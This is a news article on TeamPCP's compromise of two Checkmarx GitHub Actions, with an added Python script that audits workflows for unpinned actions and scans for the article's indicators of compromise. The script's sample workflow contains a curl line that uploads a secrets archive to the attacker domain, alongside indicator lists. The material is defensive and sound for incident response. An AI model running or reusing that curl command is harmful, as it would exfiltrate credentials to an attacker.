Cloud Security · HIGH

Cloud Security Breach - TeamPCP Hacks Checkmarx Workflows

The Hacker News
Tags: TeamPCP, Checkmarx, GitHub Actions, CVE-2026-33634, Trivy

In short: attackers used stolen CI credentials to push malicious code into two of Checkmarx's GitHub Actions.

Quick Summary

TeamPCP has compromised two Checkmarx GitHub Actions using stolen CI credentials. Because these actions run inside other organizations' CI pipelines, the compromise is a software supply chain risk for every workflow that consumed the tampered versions. Affected users need to rotate secrets and pin the actions to known-good commits now.

What Happened

The threat actor tracked as TeamPCP compromised two GitHub Actions maintained by Checkmarx, checkmarx/ast-github-action and checkmarx/kics-github-action, using stolen CI credentials. The incident follows TeamPCP's earlier compromise of the Trivy vulnerability scanner, making this the second security tool in a row that the group has turned into a distribution channel.

The activity was first observed on March 19, 2026, and was tied to a credential-stealing malware that targets cloud service credentials and CI/CD configuration files. Security firm Sysdig reported that the same stealer was used in both the Trivy and the Checkmarx attacks.

Who's Affected

The primary victims are organizations that run Checkmarx's GitHub Actions in their pipelines. These actions execute the Checkmarx AST and KICS scanners inside a CI job, so they run with whatever secrets and permissions the calling workflow grants them. A tampered version therefore has direct access to the consumer's CI credentials, and anything those credentials unlock (other repositories, cloud accounts, registries) is reachable in turn.

The risk extends well beyond Checkmarx itself. Any organization whose workflows pulled the compromised versions may have had its own CI secrets stolen, and those secrets can be reused to compromise further repositories and services, producing a cascade of supply chain compromises across the software development ecosystem.

What Data Was Exposed

The TeamPCP Cloud stealer is designed to harvest a wide range of sensitive data, including:

  • SSH keys
  • GitHub personal access tokens (PATs)
  • Cloud service credentials (AWS, Google Cloud, Azure)
  • Kubernetes and Docker configurations
  • Secrets from CI/CD environments

The attackers exfiltrate the stolen data to the domain checkmarx[.]zone, where it is stored in an encrypted archive. The malware's ability to force-push malicious commits into trusted actions complicates detection and remediation: a workflow that references the action by tag or branch keeps the same `uses:` line while the code behind it changes, so the tampered version looks like a legitimate release to every consuming pipeline.

What You Should Do

To mitigate the risks associated with this breach, organizations should take immediate action:

  • Rotate every secret and token that was available to workflows using the affected actions during the compromise window, including GitHub tokens, cloud credentials, SSH keys and registry credentials.
  • Audit GitHub Actions workflow files and job run logs for references to suspicious domains or files, in particular checkmarx[.]zone.
  • Search your GitHub organization for repositories named tpcp-docs or docs-tpcp; their presence indicates the stealer ran and exfiltrated data.
  • Pin third-party GitHub Actions to full commit SHAs rather than tags or branches, which an attacker with push access can move with a force-push.
  • Monitor outbound connections from CI runners and alert on destinations outside the expected set of package registries and vendor endpoints.
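The audit and pinning steps above can be scripted. The following is an added example, not code from the article or from Checkmarx: it parses the `uses:` lines of a workflow file, flags any action that is not pinned to a full 40-character commit SHA, and scans workflow text and job-log text for the indicators the article names (the checkmarx[.]zone domain and the tpcp-docs / docs-tpcp repository names). The sample workflow and job-log excerpt are constructed for the example, the pinned SHA is a made-up placeholder rather than a real Checkmarx release commit, and the function names are the author's own.

```python
import re

# Constructed sample workflow (not from the article). The 40-hex value on the
# kics line is a placeholder SHA, not a real Checkmarx release commit.
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  sast:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: checkmarx/ast-github-action@2.0.36
      - uses: checkmarx/kics-github-action@0123456789abcdef0123456789abcdef01234567 # v2.1.3
      - run: curl -F data=@secrets.tgz https://checkmarx.zone/upload
"""

# Constructed job-log excerpt (not a real runner log): one benign line, one exfil indicator.
SAMPLE_JOB_LOG = """\
2026-03-19T10:02:11Z Run checkmarx/kics-github-action
2026-03-19T10:02:15Z git push https://github.com/example-org/tpcp-docs main
"""

USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.MULTILINE)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Indicators named in the article; the domain appears there defanged as checkmarx[.]zone.
SUSPECT_DOMAINS = ("checkmarx.zone",)
SUSPECT_REPOS = ("tpcp-docs", "docs-tpcp")


def parse_uses(workflow_text):
    """Yield (action, ref) for each remote `uses:` entry; local (./) and docker:// refs are skipped."""
    for match in USES_RE.finditer(workflow_text):
        target = match.group(1)
        if target.startswith(("./", "docker://")) or "@" not in target:
            continue
        action, ref = target.rsplit("@", 1)
        yield action, ref


def unpinned_actions(workflow_text, owner_prefix=None):
    """Return actions whose ref is not a full commit SHA; tags and branches can be force-pushed."""
    return [
        (action, ref)
        for action, ref in parse_uses(workflow_text)
        if not FULL_SHA_RE.match(ref)
        and (owner_prefix is None or action.startswith(owner_prefix))
    ]


def suspicious_references(text):
    """Return (line_no, indicator) for every line mentioning an exfil domain or staging repo name."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        normalized = line.lower().replace("[.]", ".")  # match defanged and live forms alike
        for indicator in SUSPECT_DOMAINS + SUSPECT_REPOS:
            if indicator in normalized:
                hits.append((line_no, indicator))
    return hits


def audit(workflow_text, job_log_text=""):
    """Bundle the checks a responder would run over one workflow file and its job logs."""
    return {
        "unpinned": unpinned_actions(workflow_text),
        "unpinned_checkmarx": unpinned_actions(workflow_text, "checkmarx/"),
        "workflow_iocs": suspicious_references(workflow_text),
        "log_iocs": suspicious_references(job_log_text),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_WORKFLOW, SAMPLE_JOB_LOG).items():
        print(key, value)
```

Run it over every workflow under .github/workflows and over the job logs exported for the compromise window. A SHA pin is the right fix for the force-push problem because a moved tag cannot change which commit the runner fetches; the script does not, however, verify that a pinned SHA is itself a known-good commit, so compare any checkmarx/* pins against the vendor's post-incident release commits before trusting them.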

These measures limit both the immediate damage (stolen secrets that still work) and the follow-on risk (those secrets being used to compromise further repositories). TeamPCP's move from Trivy to Checkmarx shows that CI security tooling itself is now a target, which argues for treating every third-party action that runs with access to secrets as part of the attack surface.

🔒 Pro insight: Reuse of the same credential stealer across the Trivy and Checkmarx attacks indicates a deliberate expansion of TeamPCP's operations against widely used CI tooling, so CI/CD environments warrant the same monitoring and secret hygiene as production.

